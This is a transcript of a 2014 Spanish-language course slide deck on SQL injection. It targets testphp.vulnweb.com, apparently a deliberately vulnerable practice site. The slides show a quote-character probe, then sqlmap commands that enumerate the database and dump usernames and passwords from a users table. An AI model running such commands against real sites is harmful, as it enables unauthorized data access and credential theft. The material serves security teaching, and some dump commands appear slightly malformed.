2. ataque por inyección de código sql a sitio web

9
Especialización en Seguridad Informática Ataque por inyección de código SQL a sitio Web JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014

Transcript of 2. ataque por inyección de código sql a sitio web

Page 1: 2. ataque por inyección de código sql a sitio web

Especialización en

Seguridad Informática

Ataque por inyección de código SQL a

sitio Web

JOSÉ ALFREDO RAMÍREZ PRADA

Espinal, Septiembre de 2014

Page 2: 2. ataque por inyección de código sql a sitio web

Ataque a sitio Web http://testphp.vulnweb.com

Realizar un ataque a la base de datos del sitio

http://testphp.vulnweb.com, con lo cual se debe obtener toda la

información sobre la base de datos por ejemplo servidor de BD y

versión, nombre de la base de datos, nombre de las tablas, información

de las tablas, información de las columnas, etc.

Page 3: 2. ataque por inyección de código sql a sitio web

Se inicia el ataque en la pagina Web, por ejemplo se introduce una

comilla en el campo “Search” del formulario «Browse artists",

seguidamente en la direccion URL despues del signo igual se escribe

una comilla sencilla (´) y observamos un mensaje de error SQL.

Ataque a sitio Web http://testphp.vulnweb.com

Page 4: 2. ataque por inyección de código sql a sitio web

Identificada la vulnerabilidad, podemos atacar por medio de la consola

de comando de Windows, ubicados en el directorio C:\sqlmap

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db

Se confirma la vulnerabilidad y

sqlmap ha sido capaz de detectar

el motor de base de datos MySQL

5.0.11 y el servidor Web PHP

5.3.10, el nombre de la base de

datos ‘ACUART'.

Ataque a sitio Web http://testphp.vulnweb.com

Page 5: 2. ataque por inyección de código sql a sitio web

Seguidamente podemos identificar las tablas de la Base de Datos por medio del

comando:

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables

Ataque a sitio Web http://testphp.vulnweb.com

Page 6: 2. ataque por inyección de código sql a sitio web

una vez identificada la tabla (users) podremos identificar información de las

columnas, correspondientemente con los siguientes comandos:

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns

Ataque a sitio Web http://testphp.vulnweb.com

Page 7: 2. ataque por inyección de código sql a sitio web

una vez identificadas las columnas de la tabla procedemos a verificar la información

de los campos “uname, pass, name” de la tabla users,

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump

Ataque a sitio Web http://testphp.vulnweb.com

Page 8: 2. ataque por inyección de código sql a sitio web

De esta forma obtenemos toda la información de la base de datos del sitio Web.

Ataque a sitio Web http://testphp.vulnweb.com

Page 9: 2. ataque por inyección de código sql a sitio web

Especialización en

Seguridad Informática